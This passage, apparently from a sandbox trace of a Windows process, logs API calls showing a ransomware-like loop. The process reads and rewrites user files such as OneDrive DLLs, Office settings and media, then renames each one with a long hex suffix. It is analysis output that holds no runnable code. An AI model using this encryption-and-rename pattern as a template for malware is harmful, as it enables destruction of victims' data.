FileInformationClass=0xa) returned 0x0 [0159.349] CloseHandle (hObject=0x58c) returned 1 [0159.477] GetProcessHeap () returned 0x270000 [0159.478] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0159.479] RtlInterlockedCompareExchange64 () returned 0x1 [0159.479] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.495] ReadFile (in: hFile=0x590, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.496] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.497] WriteFile (in: hFile=0x590, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.498] RtlInterlockedCompareExchange64 () returned 0x0 [0159.498] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.499] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x708f9e4) returned 0x0 [0159.500] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml", lpString2=".65AEDCBE39C78E0832BF720FD75215E27D2397B7AA745350086219B337B15B02" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml.65AEDCBE39C78E0832BF720FD75215E27D2397B7AA745350086219B337B15B02") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml.65AEDCBE39C78E0832BF720FD75215E27D2397B7AA745350086219B337B15B02" [0159.500] GetProcessHeap () returned 0x270000 [0159.500] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x154) returned 0x35aed0 [0159.500] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x708f9d4, FileInformation=0x35aed0, Length=0x154, FileInformationClass=0xa) returned 0x0 [0159.502] CloseHandle (hObject=0x590) returned 1 [0159.506] GetProcessHeap () returned 0x270000 [0159.508] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.508] RtlInterlockedCompareExchange64 () returned 0x1 [0159.508] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.510] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.511] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.511] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.512] RtlInterlockedCompareExchange64 () returned 0x0 [0159.512] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.642] WriteFile (in: hFile=0x58c, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0159.643] RtlInterlockedCompareExchange64 () returned 0x0 [0159.643] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.666] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.667] RtlInterlockedCompareExchange64 () returned 0x0 [0159.668] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.691] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.693] RtlInterlockedCompareExchange64 () returned 0x0 [0159.693] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.863] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7422118, ReturnLength=0x708f9e4) returned 0x0 [0159.864] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll", lpString2=".A508F8E2E88E797081E3DE6302FE3DC473A54B47265881779087D3E09BD37F4D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll.A508F8E2E88E797081E3DE6302FE3DC473A54B47265881779087D3E09BD37F4D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll.A508F8E2E88E797081E3DE6302FE3DC473A54B47265881779087D3E09BD37F4D" [0159.864] GetProcessHeap () returned 0x270000 [0159.864] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x178) returned 0x427a868 [0159.864] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x708f9d4, FileInformation=0x427a868, Length=0x178, FileInformationClass=0xa) returned 0x0 [0159.875] CloseHandle (hObject=0x5ac) returned 1 [0159.919] GetProcessHeap () returned 0x270000 [0159.920] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.921] RtlInterlockedCompareExchange64 () returned 0x2 [0159.921] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.946] WriteFile (in: hFile=0x590, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0159.947] RtlInterlockedCompareExchange64 () returned 0x0 [0159.947] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.948] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x708f9e4) returned 0x0 [0159.949] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll", lpString2=".4D581DE6BDAAAAA64245D4ABDE795E302F579F868BE0D95795A4082C74743173" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll.4D581DE6BDAAAAA64245D4ABDE795E302F579F868BE0D95795A4082C74743173") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll.4D581DE6BDAAAAA64245D4ABDE795E302F579F868BE0D95795A4082C74743173" [0159.949] GetProcessHeap () returned 0x270000 [0159.949] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16a) returned 0x4286b98 [0159.949] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x708f9d4, FileInformation=0x4286b98, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0159.951] CloseHandle (hObject=0x590) returned 1 [0159.996] GetProcessHeap () returned 0x270000 [0159.998] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0159.998] RtlInterlockedCompareExchange64 () returned 0x1 [0159.998] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.002] ReadFile (in: hFile=0x590, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0160.002] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.019] WriteFile (in: hFile=0x590, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0160.022] RtlInterlockedCompareExchange64 () returned 0x0 [0160.022] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.027] ReadFile (in: hFile=0x5a8, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0160.027] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.032] ReadFile (in: hFile=0x5ac, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0160.033] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.039] ReadFile (in: hFile=0x5b4, lpBuffer=0x7492450, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0160.039] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.043] WriteFile (in: hFile=0x5a8, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0160.045] RtlInterlockedCompareExchange64 () returned 0x1 [0160.045] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.048] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x708f9e4) returned 0x0 [0160.049] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll", lpString2=".35525DAF1F3FABCBB4C8021CD59CD3DC56BAFFBAC7BAB9EC76D930101D08870B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll.35525DAF1F3FABCBB4C8021CD59CD3DC56BAFFBAC7BAB9EC76D930101D08870B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll.35525DAF1F3FABCBB4C8021CD59CD3DC56BAFFBAC7BAB9EC76D930101D08870B" [0160.049] GetProcessHeap () returned 0x270000 [0160.049] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16a) returned 0x42f0c78 [0160.049] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x708f9d4, FileInformation=0x42f0c78, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0160.207] CloseHandle (hObject=0x590) returned 1 [0160.237] GetProcessHeap () returned 0x270000 [0160.238] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0160.246] RtlInterlockedCompareExchange64 () returned 0x2 [0160.246] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.332] WriteFile (in: hFile=0x5a8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0160.334] RtlInterlockedCompareExchange64 () returned 0x0 [0160.334] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.501] WriteFile (in: hFile=0x5b4, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0160.503] RtlInterlockedCompareExchange64 () returned 0x1 [0160.503] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.505] WriteFile (in: hFile=0x590, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0160.506] RtlInterlockedCompareExchange64 () returned 0x2 [0160.506] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.510] ReadFile (in: hFile=0x5b0, lpBuffer=0x752a2a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a170 | out: lpBuffer=0x752a2a8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a170) returned 1 [0160.511] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.524] ReadFile (in: hFile=0x5b8, lpBuffer=0x757a558, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a420 | out: lpBuffer=0x757a558*, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a420) returned 1 [0160.524] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.576] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x708f9e4) returned 0x0 [0160.577] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ETWlog.dll", lpString2=".0498AA29D7460559A0AE5491BFF5C482572C81400B61E0F9685F7B543025C63E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ETWlog.dll.0498AA29D7460559A0AE5491BFF5C482572C81400B61E0F9685F7B543025C63E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ETWlog.dll.0498AA29D7460559A0AE5491BFF5C482572C81400B61E0F9685F7B543025C63E" [0160.577] GetProcessHeap () returned 0x270000 [0160.578] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15a) returned 0x327fc8 [0160.578] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x708f9d4, FileInformation=0x327fc8, Length=0x15a, FileInformationClass=0xa) returned 0x0 [0160.804] CloseHandle (hObject=0x5a8) returned 1 [0160.914] GetProcessHeap () returned 0x270000 [0160.915] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0160.915] RtlInterlockedCompareExchange64 () returned 0x7 [0160.916] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0163.869] ReadFile (in: hFile=0x5b4, lpBuffer=0x7552400, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x75322c8 | out: lpBuffer=0x7552400*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75322c8) returned 1 [0163.869] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0163.869] NtQueryObject (in: Handle=0x5bc, ObjectInformationClass=0x1, ObjectInformation=0x75aa780, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x75aa780, ReturnLength=0x708f9e4) returned 0x0 [0163.871] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg", lpString2=".928729048E870FF1A8BE53DF61BA0083206F6394E35203AB9DEF5E0578CD320E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.928729048E870FF1A8BE53DF61BA0083206F6394E35203AB9DEF5E0578CD320E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.928729048E870FF1A8BE53DF61BA0083206F6394E35203AB9DEF5E0578CD320E" [0163.871] GetProcessHeap () returned 0x270000 [0163.871] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15e) returned 0x42faf40 [0163.871] NtSetInformationFile (FileHandle=0x5bc, IoStatusBlock=0x708f9d4, FileInformation=0x42faf40, Length=0x15e, FileInformationClass=0xa) returned 0x0 [0163.908] CloseHandle (hObject=0x5bc) returned 1 [0163.913] GetProcessHeap () returned 0x270000 [0163.914] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa6d0 | out: hHeap=0x270000) returned 1 [0163.917] RtlInterlockedCompareExchange64 () returned 0x2 [0163.917] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0164.456] ReadFile (in: hFile=0x58c, lpBuffer=0x752a2a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a170 | out: lpBuffer=0x752a2a8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a170) returned 1 [0164.457] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0164.458] NtQueryObject (in: Handle=0x5c4, ObjectInformationClass=0x1, ObjectInformation=0x7668508, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7668508, ReturnLength=0x708f9e4) returned 0x0 [0164.459] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\SWYB2x61O.ods", lpString2=".AC0B7359F991CEF951AEA05466E4392A982FAA232C9FF769D6749C1512BA6414" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\SWYB2x61O.ods.AC0B7359F991CEF951AEA05466E4392A982FAA232C9FF769D6749C1512BA6414") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\SWYB2x61O.ods.AC0B7359F991CEF951AEA05466E4392A982FAA232C9FF769D6749C1512BA6414" [0164.459] GetProcessHeap () returned 0x270000 [0164.459] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x126) returned 0x425d2d0 [0164.459] NtSetInformationFile (FileHandle=0x5c4, IoStatusBlock=0x708f9d4, FileInformation=0x425d2d0, Length=0x126, FileInformationClass=0xa) returned 0x0 [0164.461] CloseHandle (hObject=0x5c4) returned 1 [0164.465] GetProcessHeap () returned 0x270000 [0164.467] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7668458 | out: hHeap=0x270000) returned 1 [0164.700] RtlInterlockedCompareExchange64 () returned 0x3 [0164.700] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.672] ReadFile (in: hFile=0x5e4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0165.672] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.675] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x708f9e4) returned 0x0 [0165.676] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Oz2eLzn.mp3", lpString2=".87DB4288DA308E8F8C15B3A0D70C35AB715D9C71A21DAAEFF9FD07874374666C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Oz2eLzn.mp3.87DB4288DA308E8F8C15B3A0D70C35AB715D9C71A21DAAEFF9FD07874374666C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Oz2eLzn.mp3.87DB4288DA308E8F8C15B3A0D70C35AB715D9C71A21DAAEFF9FD07874374666C" [0165.676] GetProcessHeap () returned 0x270000 [0165.676] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11c) returned 